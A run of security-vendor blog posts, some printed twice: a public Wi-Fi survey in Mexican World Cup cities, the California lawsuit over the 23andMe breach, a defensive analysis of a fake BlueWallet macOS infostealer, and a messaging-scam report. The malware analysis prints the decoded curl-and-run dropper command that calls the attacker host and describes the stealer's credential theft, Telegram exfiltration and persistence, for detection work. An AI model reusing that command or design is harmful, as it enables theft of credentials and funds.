One of the biggest football (soccer) events of this summer is the World Cup 2026. The tournament is co-hosted by three countries: the U.S., Canada, and Mexico. Unfortunately, events of this scale attract not just fans, but also scammers from all over the globe. We’ve already covered how cybercriminals are prepping for the World Cup online, and today we’re talking about digital security for fans on the ground in Mexico.
The country will host 13 matches and welcome millions of tourists. They’ll be staying in hotels, heading to games, checking out restaurants, navigating airports, and visiting popular tourist spots — and everywhere they go, the temptation to connect to public Wi-Fi will be high.
We’ve surveyed more than 84 500 (!) public Wi-Fi access points in Mexico City, Guadalajara, and Monterrey — and we have a lot to share about their security. Spoiler alert: many networks are still using outdated security standards, so you really shouldn’t go on vacation without reliable protection and an eSIM.
Walking across Mexico looking for public Wi-Fi access points would have been a bit tough, though that’s exactly what we did for a similar Wi-Fi security survey in Paris. You can check out the results of that in our post, How safe is Wi-Fi in Paris?
This time the mission was far more demanding: mapping the wireless landscape of three major metropolises. That’s why we went wardriving — scanning for and logging wireless networks from a moving vehicle while equipped with a smartphone or laptop. It’s similar to searching for Wi-Fi on your phone, where the device constantly listens for nearby networks. Except instead of connecting to them, we just collect data about them.
All information was used strictly for passive observation and infrastructure analysis. Beyond receiving publicly broadcast service information, the experts of Kaspersky’s Global Research and Analysis Team (GReAT) didn’t attempt to authenticate, intercept traffic, exploit systems, or otherwise interact with the wireless networks they discovered. Mobile access points deployed in cars and on mobile devices were excluded from the sample.
Our main target was Mexico City — the capital and one of the most densely populated cities in Latin America. We took a drive through popular tourist spots: Mexico City Stadium, Mexico City International Airport, Zócalo, Paseo de la Reforma, Colonia Roma, La Condesa, Polanco, Coyoacán.
In Guadalajara and Monterrey, we drove similar routes: stadiums, main avenues, airports, and popular neighborhoods. Below you can see a heatmap of the areas we covered, ranging from red for areas with the highest density of public access points, through yellow and green, to blue for the lowest concentration.
We used passive radio reconnaissance to log 84 500 signals and 69 500 unique network identifiers across these three cities. The majority of the signals were caught in Mexico City (61.4%), followed by Guadalajara (23.6%) and Monterrey (14.8%).
What we analyzed:
You can find the full version of the study on the Securelist blog.
Network names (SSIDs) can tell you a lot by unintentionally revealing information about hardware manufacturers, ISPs, deployment methods, and whether an access point belongs to a business or a private user.
About 34% of the public Wi-Fi networks we logged didn’t bother changing their names at all, either sticking with the factory SSIDs from the router manufacturers or using standard naming conventions from their ISPs. For attackers, this can be a pretty solid hint, since this kind of network name lets them know which provider owns a given access point, what hardware is being used, and how it’s likely configured by default.
Another troubling nuance is the large number of Wi-Fi networks (over 30%) that use the access point’s MAC address (BSSID) as the visible network name. The first few bytes of a BSSID contain an Organizationally Unique Identifier (OUI), which gives away the router’s manufacturer. This is a useful lead for bad actors: they can find out who made the hardware and test for vulnerabilities specific to that brand’s models.
An access point secured with WPA2/WPA3 can be considered more or less safe. All other authentication mechanisms yield much weaker results. We grouped the public Wi-Fi networks into four categories:
The results are roughly the same across all three cities: about 82% of all analyzed access points are protected by secure standards. The outdated and insecure WPA protocol was practically nonexistent. However, more than 10% of the access points turned out to be completely unsecured. Connecting to these networks carries the risk of traffic interception and hidden surveillance.
But security isn’t evaluated by WPA protocols alone. We also checked for the presence of WPS, the infamous feature for quickly connecting to a network without entering a password, which is highly vulnerable to attacks. It turned out that WPS is enabled on nearly half (47%) of the access points in Mexico City, 43% in Guadalajara, and 41% in Monterrey. On average, 45% of the access points are potentially vulnerable to WPS-related attacks — sacrificing security for the sake of convenience.
What’s more, this feature frequently remained active even on seemingly secure WPA2/WPA3 networks — about half of them utilized WPS. This shows that having WPA2/WPA3 is still not enough to consider a Wi-Fi access point safe, as additional features like WPS can still leave the door open to attacks.
Digital risks on a trip aren’t limited to public Wi-Fi alone, especially now that many are shifting away from public Wi-Fi to an eSIM. There are still plenty of threats in crowded places: public USB chargers, QR codes with swapped links, NFC and Bluetooth attacks, and, of course, social engineering tactics. Let’s break it all down.
Charging stations. Public USB chargers can also be dangerous: bad actors could potentially gain access to the data on your device or try to install malware. We covered these attacks in detail in our post, Data theft during smartphone charging.
Dangerous QR codes. Criminals can plant phishing QR codes in popular tourist spots. The pretexts can vary wildly; for instance, ads for team-specific fan “events”, or links supposedly offering discounts or restaurant menus. In reality, any QR code posted on the street can be considered insecure by default, and you shouldn’t scan them with your smartphone unless you have a QR code threat analyzer installed.
Fake broadcasts, tickets, and betting pools. Earlier, we described cases where bad actors were distributing malware via fake IPTV apps to capitalize on the WC26 hype. Remember, even if you plan to watch the tournament from home, you still need to stay alert and not trust the first sites that pop up advertising free broadcasts, offering betting pools, or promising unbelievably generous payouts.
NFC and Bluetooth attacks. Leaving Bluetooth enabled in crowded places can also cause problems: someone might try to discover your device, track you, or initiate an unwanted pairing request. NFC services with contactless payments create additional risks too — especially when paying in sketchy spots.
Despite the prevalence of secure WPA2/WPA3 public Wi-Fi access points in Mexico City, Guadalajara, and Monterrey, our study shows that public Wi-Fi networks remain vulnerable. It’s also important to remember that attackers can create fake networks — so-called evil twins — disguised as legitimate public Wi-Fi in airports, hotels, cafés, and tourist spots.
For the average user, it’s practically impossible to tell how safe a specific access point is when trying to connect. That’s why the safest option is to use cellular data to access the internet — completely eliminating the need for Wi-Fi. Besides, there’s no need to research the nuances of local laws, rates, and other cellular details for every country you plan to visit; you can just buy a global eSIM online in two clicks. We explained how to make the entire process hassle-free in our post, Internet on the go with Kaspersky eSIM Store.
If you still plan on connecting to public Wi-Fi, always use a VPN to secure your device and data when connecting to unfamiliar — especially unsecured — Wi-Fi networks. This creates an encrypted tunnel between your device and the VPN server, making it impossible to intercept your data along the way. Haven’t picked a VPN yet? Try Kaspersky VPN Secure Connection, which is included with both Kaspersky Premium and Kaspersky Plus subscriptions.
Now, if you still plan to attend the World Cup without any cybersecurity solution, at least follow these basic rules of digital hygiene:
What else to read to make sure cheering for your favorite team isn’t only exciting, but also safe:




California has sued the former shell of DNA testing company 23andMe over alleged security failures and misleading statements surrounding its 2023 data breach.
On May 27, 2026, Attorney General Rob Bonta filed suit in San Francisco Superior Court against Chrome Holding Co., the company now handling 23andMe’s remaining assets following its bankruptcy.
California’s complaint accuses 23andMe of failing to implement reasonable security measures to protect sensitive data and alleges violations of several state privacy and consumer protection laws. It also accuses the company of making misleading statements about its security practices.
The 2023 breach used old-school credential-stuffing tactics against 23andMe’s login page. Attackers operated inside the systems for roughly five months without anyone noticing. The direct compromise was modest, affecting about 14,000 accounts, but that was all the attackers needed to steal the data of just under seven million customers.
The intruders pivoted from those accounts through DNA Relatives, the platform’s headline feature, which enabled people to determine who they were connected with through DNA similarity. The lawsuit alleges a critical coding error in that feature enabled the perpetrators to scrape data from millions of other users connected by biological kinship.
After the breach went public, 23andMe sent victims’ legal representatives a letter blaming users for reusing passwords from sites that had been compromised earlier. The exposed data, the company suggested, had been shared of the users’ own free will and would not cause “pecuniary harm.”
The harms stemming from genetic data theft extend far beyond financial losses, however. The genetic information that was stolen enabled thieves to determine an individual’s genetic origins.
The data was reportedly offered for sale on the dark web with this information as a selling point, enabling sellers to offer records on Asian American Pacific Islander (AAPI) or Jewish customers, for example. Bonta’s office pointed out that antisemitic violence was on the rise at the time.
In spite of the letter’s attempt to blame users, only about 14,000 accounts were directly compromised through password reuse. The rest of the data was allegedly exposed through 23andMe’s own product. According to the complaint, the coding error in DNA Relatives exposed the data of anyone who had opted into the service, not just those linked to the 14,000 compromised accounts.
California is seeking statutory penalties ranging from $1,000 to $7,500 per violation. With 855,541 Californians among the affected users, the costs could mount up quickly.
The question is how much of it the state will collect if it wins its case. 23andMe filed for Chapter 11 bankruptcy in March 2025, then sold most of its assets, including the genomic data of more than 15 million customers, to TTAM Research Institute, a nonprofit founded by former 23andMe CEO Anne Wojcicki. California and several other states opposed the sale on Genetic Information Privacy Act grounds, but a federal bankruptcy judge approved it. The states are now appealing that decision.
Chrome Holding Co., the corporate shell that remains of 23andMe, received $305 million from that sale. But others have already been picking over what’s left.
Other regulators have already had their turn. The UK Information Commissioner’s Office fined 23andMe £2.31 million in June last year following a joint investigation with the Privacy Commissioner of Canada. A federal court initially approved a $30 million class-action settlement covering most US customer claims. That settlement later grew to $50 million and received final approval in January 2026.
If you tested with 23andMe, the standard breach hygiene still applies. Reset any password you reused on other sites and turn on multi-factor authentication wherever it’s offered. Credential stuffing only works on usernames and passwords that have already been exposed elsewhere. Also watch for phishing attacks that name-drop 23andMe or the breach itself. And maybe weigh the benefits of using DNA testing services against the security risks.
Because there’s one part of this that no fine and no settlement can solve: stolen genetic data sold on the dark web cannot be taken back. Passwords can be changed. DNA can’t.
Browse like no one’s watching.
Malwarebytes Privacy VPN encrypts your connection and never logs what you do, so the next story you read doesn’t have to feel personal. Try it free →
California has sued the former shell of DNA testing company 23andMe over alleged security failures and misleading statements surrounding its 2023 data breach.
On May 27, 2026, Attorney General Rob Bonta filed suit in San Francisco Superior Court against Chrome Holding Co., the company now handling 23andMe’s remaining assets following its bankruptcy.
California’s complaint accuses 23andMe of failing to implement reasonable security measures to protect sensitive data and alleges violations of several state privacy and consumer protection laws. It also accuses the company of making misleading statements about its security practices.
The 2023 breach used old-school credential-stuffing tactics against 23andMe’s login page. Attackers operated inside the systems for roughly five months without anyone noticing. The direct compromise was modest, affecting about 14,000 accounts, but that was all the attackers needed to steal the data of just under seven million customers.
The intruders pivoted from those accounts through DNA Relatives, the platform’s headline feature, which enabled people to determine who they were connected with through DNA similarity. The lawsuit alleges a critical coding error in that feature enabled the perpetrators to scrape data from millions of other users connected by biological kinship.
After the breach went public, 23andMe sent victims’ legal representatives a letter blaming users for reusing passwords from sites that had been compromised earlier. The exposed data, the company suggested, had been shared of the users’ own free will and would not cause “pecuniary harm.”
The harms stemming from genetic data theft extend far beyond financial losses, however. The genetic information that was stolen enabled thieves to determine an individual’s genetic origins.
The data was reportedly offered for sale on the dark web with this information as a selling point, enabling sellers to offer records on Asian American Pacific Islander (AAPI) or Jewish customers, for example. Bonta’s office pointed out that antisemitic violence was on the rise at the time.
In spite of the letter’s attempt to blame users, only about 14,000 accounts were directly compromised through password reuse. The rest of the data was allegedly exposed through 23andMe’s own product. According to the complaint, the coding error in DNA Relatives exposed the data of anyone who had opted into the service, not just those linked to the 14,000 compromised accounts.
California is seeking statutory penalties ranging from $1,000 to $7,500 per violation. With 855,541 Californians among the affected users, the costs could mount up quickly.
The question is how much of it the state will collect if it wins its case. 23andMe filed for Chapter 11 bankruptcy in March 2025, then sold most of its assets, including the genomic data of more than 15 million customers, to TTAM Research Institute, a nonprofit founded by former 23andMe CEO Anne Wojcicki. California and several other states opposed the sale on Genetic Information Privacy Act grounds, but a federal bankruptcy judge approved it. The states are now appealing that decision.
Chrome Holding Co., the corporate shell that remains of 23andMe, received $305 million from that sale. But others have already been picking over what’s left.
Other regulators have already had their turn. The UK Information Commissioner’s Office fined 23andMe £2.31 million in June last year following a joint investigation with the Privacy Commissioner of Canada. A federal court initially approved a $30 million class-action settlement covering most US customer claims. That settlement later grew to $50 million and received final approval in January 2026.
If you tested with 23andMe, the standard breach hygiene still applies. Reset any password you reused on other sites and turn on multi-factor authentication wherever it’s offered. Credential stuffing only works on usernames and passwords that have already been exposed elsewhere. Also watch for phishing attacks that name-drop 23andMe or the breach itself. And maybe weigh the benefits of using DNA testing services against the security risks.
Because there’s one part of this that no fine and no settlement can solve: stolen genetic data sold on the dark web cannot be taken back. Passwords can be changed. DNA can’t.
Browse like no one’s watching.
Malwarebytes Privacy VPN encrypts your connection and never logs what you do, so the next story you read doesn’t have to feel personal. Try it free →
A fake website impersonating BlueWallet (a real Bitcoin wallet) is targeting Mac users with a simple but effective attack. BlueWallet itself has not been compromised. Instead, cybercriminals have stolen the name and branding of the legitimate Bitcoin wallet to make a malicious download appear trustworthy.
If you went looking for a cryptocurrency wallet and landed on one of these fake BlueWallet download pages, the site tried to trick you into opening a downloaded file in a built-in macOS tool and pressing “Run.” If you followed those instructions, the malware could steal saved passwords, browser logins, cryptocurrency wallets, documents, and other sensitive data. It also watches the clipboard for cryptocurrency wallet addresses and can replace them with attacker-controlled addresses..
That last feature is particularly dangerous. If you copy a wallet address before sending funds, the malware can silently replace it with the attacker’s address. Everything looks normal on screen, but the money goes somewhere else.
Should you worry? Only if you downloaded and ran the file. Simply visiting the page and closing it does nothing on its own. The attack depends entirely on the user opening the script and pressing play.
If you did run it, treat the machine as compromised and follow the steps below.
If you opened the file and pressed play, assume your device was compromised and work through these steps:
~/Library/LaunchAgents.sysupd.sh file in /tmp.ssh, .aws, or .gnupg files were present on the machineThe most interesting part of this campaign isn’t technical. The attackers didn’t break into the Mac or bypass Apple’s security protections. They persuaded victims to run the malware themselves.
The fake website walks users through the process with a convincing download page, simple instructions, and even a keyboard shortcut. The attack succeeds because the victim trusts what they are seeing.
As operating systems get better at blocking malicious software, attackers are increasingly investing in social engineering. Instead of finding ways around security controls, they convince people to click through them.
That’s why one habit is becoming increasingly important: Be suspicious of any download that arrives with instructions to open it in a scripting tool, developer utility, or Terminal window and press “Run.”
In this campaign, a single press of ⌘R was enough to turn a Mac into a password stealer, cryptocurrency wallet thief, clipboard hijacker, and remote access tool.
The page lives at update-bluewallet[.]com, a domain name close enough to the real wallet (bluewallet.io) to pass a quick glance. The first thing the page does is not wait for consent. Its script calls a download routine on a two-second timer the moment the page loads, and again if the visitor clicks either of two buttons.
The file that lands in the Downloads folder is named BlueWallet Installer.applescript, an extension most people have never seen and have no instinct to distrust.
Then the page does something quietly clever. After a short delay, it rewrites its own status text to read like setup instructions: open the installer, then press the play button or ⌘R. It even draws a small blue play triangle in the text so the wording matches the real Script Editor interface the victim is about to see.

The page walks the victim through the exact motions needed to run the file.
On modern macOS, an unsigned application downloaded from the web gets quarantined and checked before it can run. A plain script opened in Script Editor and executed by the user sidesteps that flow. The person is manually instructing a trusted Apple tool to run code, so there is no notarization gate to fail.
This is why the attacker chose an AppleScript instead of a packaged app: it moves the risky action out of the operating system’s hands and into the victim’s.
The AppleScript itself is remarkably short. Stripped of its decorative comments, including a fake version number and a line claiming to be a “Brew Install Upgrade,” it runs a single base64-encoded shell command and then tells Script Editor to quit without saving, removing the evidence from view.

Decoded, that command does this:
curl -s 'https://projects2026box[.]com/serve_site/confighelper_0adfeee8.sh' -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh >/dev/null 2>&1 &
It fetches a second script from a remote host, saves it to a hidden file in the temp directory, makes it executable, and runs it in the background with all output suppressed.
The victim sees nothing. The filename .sysupd.sh is dressed up to look like a system update. This is a textbook staged dropper: stage one is tiny and disposable, and its only job is to fetch the real payload.
The first lines establish how the malware intends to operate. It sets umask 077 so everything it creates is readable only by the compromised user, then builds a hidden, randomly named working directory under /tmp seeded from /dev/urandom.
Its configuration is obfuscated, but weakly. A small function named _xd walks a hex string two characters at a time and XORs each byte against a hardcoded repeating key: swckR9JCD2Uu.
That function decodes the script’s Telegram bot token, chat identifier, secondary command token, and staging URL at runtime. It is enough to defeat tools that only search for plaintext strings, but not much more. Because the key and algorithm are both sitting in the file, every encoded value is fully recoverable.
One detail stands out: The decoded Telegram chat value and decoded command-and-control chat value are identical. The attacker is using a single Telegram channel as both the exfiltration drop and the control channel. It is cheap, scalable, encrypted, and blends into ordinary HTTPS traffic.
Not everything is obfuscated. The clipboard-hijacking addresses are sitting in the file in plain text: a Bitcoin address, an Ethereum address, and a Solana address. These are the addresses the implant swaps in when it catches you copying a wallet address. Because they are public on their respective blockchains, they are also among the most useful artifacts in the whole sample.
The second stage’s collection routines are sweeping. They pull from six broad categories.
The script extracts history, cookies, login data, and bookmarks from a wide range of browsers, including:
This appears to be the script’s primary focus.
It targets desktop wallet applications including Electrum, Electrum-LTC, Exodus, Atomic Wallet, Ledger Live, Trezor Suite, Bitcoin Core, Litecoin Core, DashCore, Dogecoin Core, Coinomi, Monero, Sparrow, Armory, BlueWallet, Zengo, Trust Wallet, Binance Desktop, and Tonkeeper.
It also targets browser-extension wallets across several ecosystems:
The malware targets local storage and settings for several password managers, including LastPass, 1Password, Dashlane, Bitwarden, Keeper, RoboForm, NordPass, Enpass, StickyPassword, TrueKey, Passbolt, and Buttercup.
It also looks for data associated with 2FA and authenticator tools, including Google Authenticator, Authy, Duo, Microsoft Authenticator, 2FAS, and FreeOTP.
The script attempts to copy session data and local storage for Telegram Desktop and Discord, including Discord Canary and Discord PTB.
It looks for credentials and configuration files in the user’s home directory, including:
.aws.ssh.gnupg.kube.zshrc, .zsh_history, .bash_history, and .gitconfigThe script copies the local Apple Notes database, NoteStore.sqlite.
It also looks for browser-extension data related to shopping and productivity tools, including Honey, CapitalOne Shopping, Rakuten, CamelCamelCamel, Grammarly, Evernote, Notion Clipper, Todoist, and Google Keep.
Finally, it scans Desktop, Documents, and Downloads for files with extensions including .txt, .pdf, .docx, .doc, .rtf, .wallet, .key, .keys, .seed, .kdbx, .pem, and .env, under a size cap.
The malware tries to capture the user’s account password directly. An osascript dialog titled “System Preferences” asks the user to re-enter their password “to continue.” The script validates each attempt against dscl . authonly before saving it, so it only stops once it has a working credential.
For exfiltration, it archives the staged data with macOS’s own ditto, likely because it is always present, unlike zip. To stay under Telegram’s 50 MB upload limit, it breaks larger archives into 49 MB chunks with split before sending each part.
It establishes persistence by writing a LaunchAgent plist into the user’s ~/Library/LaunchAgents, backed by a hidden support directory, and loading it with launchctl so the implant runs again at every login.
The clipboard hijack is a live background loop. A clip_watch function continuously inspects the clipboard, matches Bitcoin, Ethereum, and Solana address formats by regex, reports the original address to the command-and-control channel, and overwrites the clipboard with the attacker’s address via pbcopy.
That means the substitution happens silently between copy and paste.
Finally, the malware can be controlled interactively. A c2_loop polls the Telegram bot for commands and supports a full operator toolkit:
/info for system details/exec for arbitrary shell commands/clipboard to read current clipboard contents/download to pull specific files/exfil to rerun the theft module/selfdestruct to wipe tracesThis makes the Telegram channel a real-time remote-control link, not just a one-way drop.
The pattern here is familiar and getting more common: lean on tools that are already trusted.
The delivery abuses Apple’s own Script Editor. The configuration hides behind a trivial XOR rather than packed binaries. The command channel rides Telegram’s Bot API, which can pass through egress filters that would flag an unknown server.
None of these pieces is novel on its own. The effectiveness comes from stacking legitimate-looking components so no single step trips an alarm.
The lessons here are less about the lure and more about the technique itself.
Script Editor executing a one-line base64 do shell script that immediately quits is a strong behavioral signal, and a far better detection target than the disposable stage-one file. So is a hidden /tmp/.sysupd.sh downloaded by curl and launched in the background.
Browsers and download surfaces could treat .applescript files arriving from the web with the same suspicion as executables. And Telegram remains an under-addressed command-and-control medium that bot-token abuse reporting could disrupt at the source.
216277bdb7998b48852024fc8b5853c3dc50b3857fd22afd1320b884bcaa0a61 (BlueWallet Installer.applescript)update-bluewallet[.]comprojects2026box[.]combc1qrmj4ggshddhnxx3rxwvsu8pe9ut6cgx8mx364e0x2B871703122064e45d77146a6D5203da3bD192FA8dtdRQePrKz97FszwMEa4QvptdAAcbAFs7kBojr5Mz3vWe don’t just report on threats—we remove them
Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
A fake website impersonating BlueWallet (a real Bitcoin wallet) is targeting Mac users with a simple but effective attack. BlueWallet itself has not been compromised. Instead, cybercriminals have stolen the name and branding of the legitimate Bitcoin wallet to make a malicious download appear trustworthy.
If you went looking for a cryptocurrency wallet and landed on one of these fake BlueWallet download pages, the site tried to trick you into opening a downloaded file in a built-in macOS tool and pressing “Run.” If you followed those instructions, the malware could steal saved passwords, browser logins, cryptocurrency wallets, documents, and other sensitive data. It also watches the clipboard for cryptocurrency wallet addresses and can replace them with attacker-controlled addresses..
That last feature is particularly dangerous. If you copy a wallet address before sending funds, the malware can silently replace it with the attacker’s address. Everything looks normal on screen, but the money goes somewhere else.
Should you worry? Only if you downloaded and ran the file. Simply visiting the page and closing it does nothing on its own. The attack depends entirely on the user opening the script and pressing play.
If you did run it, treat the machine as compromised and follow the steps below.
If you opened the file and pressed play, assume your device was compromised and work through these steps:
~/Library/LaunchAgents.sysupd.sh file in /tmp.ssh, .aws, or .gnupg files were present on the machineThe most interesting part of this campaign isn’t technical. The attackers didn’t break into the Mac or bypass Apple’s security protections. They persuaded victims to run the malware themselves.
The fake website walks users through the process with a convincing download page, simple instructions, and even a keyboard shortcut. The attack succeeds because the victim trusts what they are seeing.
As operating systems get better at blocking malicious software, attackers are increasingly investing in social engineering. Instead of finding ways around security controls, they convince people to click through them.
That’s why one habit is becoming increasingly important: Be suspicious of any download that arrives with instructions to open it in a scripting tool, developer utility, or Terminal window and press “Run.”
In this campaign, a single press of ⌘R was enough to turn a Mac into a password stealer, cryptocurrency wallet thief, clipboard hijacker, and remote access tool.
The page lives at update-bluewallet[.]com, a domain name close enough to the real wallet (bluewallet.io) to pass a quick glance. The first thing the page does is not wait for consent. Its script calls a download routine on a two-second timer the moment the page loads, and again if the visitor clicks either of two buttons.
The file that lands in the Downloads folder is named BlueWallet Installer.applescript, an extension most people have never seen and have no instinct to distrust.
Then the page does something quietly clever. After a short delay, it rewrites its own status text to read like setup instructions: open the installer, then press the play button or ⌘R. It even draws a small blue play triangle in the text so the wording matches the real Script Editor interface the victim is about to see.

The page walks the victim through the exact motions needed to run the file.
On modern macOS, an unsigned application downloaded from the web gets quarantined and checked before it can run. A plain script opened in Script Editor and executed by the user sidesteps that flow. The person is manually instructing a trusted Apple tool to run code, so there is no notarization gate to fail.
This is why the attacker chose an AppleScript instead of a packaged app: it moves the risky action out of the operating system’s hands and into the victim’s.
The AppleScript itself is remarkably short. Stripped of its decorative comments, including a fake version number and a line claiming to be a “Brew Install Upgrade,” it runs a single base64-encoded shell command and then tells Script Editor to quit without saving, removing the evidence from view.

Decoded, that command does this:
curl -s 'https://projects2026box[.]com/serve_site/confighelper_0adfeee8.sh' -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh >/dev/null 2>&1 &
It fetches a second script from a remote host, saves it to a hidden file in the temp directory, makes it executable, and runs it in the background with all output suppressed.
The victim sees nothing. The filename .sysupd.sh is dressed up to look like a system update. This is a textbook staged dropper: stage one is tiny and disposable, and its only job is to fetch the real payload.
The first lines establish how the malware intends to operate. It sets umask 077 so everything it creates is readable only by the compromised user, then builds a hidden, randomly named working directory under /tmp seeded from /dev/urandom.
Its configuration is obfuscated, but weakly. A small function named _xd walks a hex string two characters at a time and XORs each byte against a hardcoded repeating key: swckR9JCD2Uu.
That function decodes the script’s Telegram bot token, chat identifier, secondary command token, and staging URL at runtime. It is enough to defeat tools that only search for plaintext strings, but not much more. Because the key and algorithm are both sitting in the file, every encoded value is fully recoverable.
One detail stands out: The decoded Telegram chat value and decoded command-and-control chat value are identical. The attacker is using a single Telegram channel as both the exfiltration drop and the control channel. It is cheap, scalable, encrypted, and blends into ordinary HTTPS traffic.
Not everything is obfuscated. The clipboard-hijacking addresses are sitting in the file in plain text: a Bitcoin address, an Ethereum address, and a Solana address. These are the addresses the implant swaps in when it catches you copying a wallet address. Because they are public on their respective blockchains, they are also among the most useful artifacts in the whole sample.
The second stage’s collection routines are sweeping. They pull from six broad categories.
The script extracts history, cookies, login data, and bookmarks from a wide range of browsers, including:
This appears to be the script’s primary focus.
It targets desktop wallet applications including Electrum, Electrum-LTC, Exodus, Atomic Wallet, Ledger Live, Trezor Suite, Bitcoin Core, Litecoin Core, DashCore, Dogecoin Core, Coinomi, Monero, Sparrow, Armory, BlueWallet, Zengo, Trust Wallet, Binance Desktop, and Tonkeeper.
It also targets browser-extension wallets across several ecosystems:
The malware targets local storage and settings for several password managers, including LastPass, 1Password, Dashlane, Bitwarden, Keeper, RoboForm, NordPass, Enpass, StickyPassword, TrueKey, Passbolt, and Buttercup.
It also looks for data associated with 2FA and authenticator tools, including Google Authenticator, Authy, Duo, Microsoft Authenticator, 2FAS, and FreeOTP.
The script attempts to copy session data and local storage for Telegram Desktop and Discord, including Discord Canary and Discord PTB.
It looks for credentials and configuration files in the user’s home directory, including:
.aws.ssh.gnupg.kube.zshrc, .zsh_history, .bash_history, and .gitconfigThe script copies the local Apple Notes database, NoteStore.sqlite.
It also looks for browser-extension data related to shopping and productivity tools, including Honey, CapitalOne Shopping, Rakuten, CamelCamelCamel, Grammarly, Evernote, Notion Clipper, Todoist, and Google Keep.
Finally, it scans Desktop, Documents, and Downloads for files with extensions including .txt, .pdf, .docx, .doc, .rtf, .wallet, .key, .keys, .seed, .kdbx, .pem, and .env, under a size cap.
The malware tries to capture the user’s account password directly. An osascript dialog titled “System Preferences” asks the user to re-enter their password “to continue.” The script validates each attempt against dscl . authonly before saving it, so it only stops once it has a working credential.
For exfiltration, it archives the staged data with macOS’s own ditto, likely because it is always present, unlike zip. To stay under Telegram’s 50 MB upload limit, it breaks larger archives into 49 MB chunks with split before sending each part.
It establishes persistence by writing a LaunchAgent plist into the user’s ~/Library/LaunchAgents, backed by a hidden support directory, and loading it with launchctl so the implant runs again at every login.
The clipboard hijack is a live background loop. A clip_watch function continuously inspects the clipboard, matches Bitcoin, Ethereum, and Solana address formats by regex, reports the original address to the command-and-control channel, and overwrites the clipboard with the attacker’s address via pbcopy.
That means the substitution happens silently between copy and paste.
Finally, the malware can be controlled interactively. A c2_loop polls the Telegram bot for commands and supports a full operator toolkit:
/info for system details/exec for arbitrary shell commands/clipboard to read current clipboard contents/download to pull specific files/exfil to rerun the theft module/selfdestruct to wipe tracesThis makes the Telegram channel a real-time remote-control link, not just a one-way drop.
The pattern here is familiar and getting more common: lean on tools that are already trusted.
The delivery abuses Apple’s own Script Editor. The configuration hides behind a trivial XOR rather than packed binaries. The command channel rides Telegram’s Bot API, which can pass through egress filters that would flag an unknown server.
None of these pieces is novel on its own. The effectiveness comes from stacking legitimate-looking components so no single step trips an alarm.
The lessons here are less about the lure and more about the technique itself.
Script Editor executing a one-line base64 do shell script that immediately quits is a strong behavioral signal, and a far better detection target than the disposable stage-one file. So is a hidden /tmp/.sysupd.sh downloaded by curl and launched in the background.
Browsers and download surfaces could treat .applescript files arriving from the web with the same suspicion as executables. And Telegram remains an under-addressed command-and-control medium that bot-token abuse reporting could disrupt at the source.
216277bdb7998b48852024fc8b5853c3dc50b3857fd22afd1320b884bcaa0a61 (BlueWallet Installer.applescript)update-bluewallet[.]comprojects2026box[.]combc1qrmj4ggshddhnxx3rxwvsu8pe9ut6cgx8mx364e0x2B871703122064e45d77146a6D5203da3bD192FA8dtdRQePrKz97FszwMEa4QvptdAAcbAFs7kBojr5Mz3vWe don’t just report on threats—we remove them
Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

It starts with the familiar: a short message, a trusted name, a routine tone. Delivery updates, work pings, brand alerts hum in the background, rarely attracting scrutiny. You check, you answer… — until minutes later you’ve slipped into a trap built to lower your guard and hijack your trust.
That’s why messaging scams cut deep: they exploit everyday habits where instinct, not caution, leads. Communication once moved slowly, leaving room for doubt. Now it’s instant — and that speed is a weapon in criminal hands.
On our blog, we’ve already examined numerous scam schemes in messaging apps — from pig butchering, where the victim is groomed for a very long time, or catfishing, where the scammer creates a fake identity, to phishing via chatbots or through gift-giving campaigns in messaging apps.
Now, for the first time, Kaspersky has set out to capture the full end-to-end reality of messaging-based scams to understand how quickly harm occurs, how they impact trust and what remains after the interaction ends. What emerges is a highly organized and industrialized scam ecosystem embedded within everyday messaging channels such as SMS, WhatsApp, and email.
Kaspersky experts have prepared a report on targeted scams in messaging apps, detailing not only the financial but also the emotional damage caused by such attacks, as well as providing tips on how to protect yourself and avoid them. In this post, we explore the most interesting facts, but you can find more details in the full report.
How much do you think a single successful attack via a messaging app costs the average victim? Ten dollars? Or maybe 50? You’re underestimating the scammers. Although more than a third (36%) of victims incur losses of less than $135, on average a victim loses… $733!
| Country | Average loss per victim |
| Senegal | $392.94 |
| Serbia | $493.32 |
| Morocco | $504.28 |
| Greece | $609.32 |
| United Kingdom | $617.38 |
| Côte d’Ivoire | $654.11 |
| Spain | $672.67 |
| United States | $724.73 |
| Portugal | $868.20 |
| Italy | $896.02 |
| France | $1,193.58 |
| Germany | $1,369.35 |
The average amount lost by a victim in a successful attack via a messaging app
On the one hand, the financial hit doesn’t look catastrophic in isolation. These are micro-losses by design. Small enough that some never report them to the police. Small enough that banks don’t always investigate. Small enough to be dismissed as bad luck rather than organized crime.
But $733 is not nothing. It’s enough to cover a month’s worth of groceries, school or daycare fees, or utility bills. Against the backdrop of the global cost-of-living crisis, a single such loss can seriously dent a family’s budget.
In 11% of cases, losses exceed $1,350, and more than a quarter of victims (28%) report having been scammed three or more times in the past six months. Once scammers discover that a phone number responds, that contact becomes an asset, circulating from one database to another.
Now imagine the scale of the problem: if just 10% of the three billion messaging‑app users worldwide fell victim with the average loss, the total damage would amount to… nearly $220 billion! This is comparable to the GDP of Greece, and exceeds that of Morocco, Serbia, or Côte d’Ivoire.
It becomes clear that behind the daily flood of fraudulent schemes lie large scam cartels operating on an industrial scale, using AI to personalize messages that mimic those of family members, friends, and familiar brands. This, in essence, forms the basis of a full-fledged economy built on digital identity theft.
More than half of successful messaging scams (52%) unfold in under 30 minutes — from first contact to the moment money or personal data changes hands — or even faster, before the victim begins to doubt the legitimacy of the sender. In fact, one in seven scams takes less than five minutes — quicker than boiling an egg!
The speed isn’t accidental. It’s the method. Scammers structure their schemes to deny the victim a chance to come to their senses. Every element is engineered to compress the decision-making window: the urgency of the scenario, the familiarity of the format, the plausibility of the request.
They rush you — faster, faster, don’t tell anyone, you only have a few minutes, solve the problem, don’t ask questions. Click the link, fill in the details, approve the transaction, or else… Or else what? The scammers’ imagination knows no bounds here, but if you don’t do something right now, you’ll definitely regret it.
Alas, the realization of what has happened usually comes when the damage is already irreversible. More than half of victims (51%) lose money; another 43% hand over their personal data — most commonly phone numbers, names, and email addresses — to scammers, and often the victim loses both.
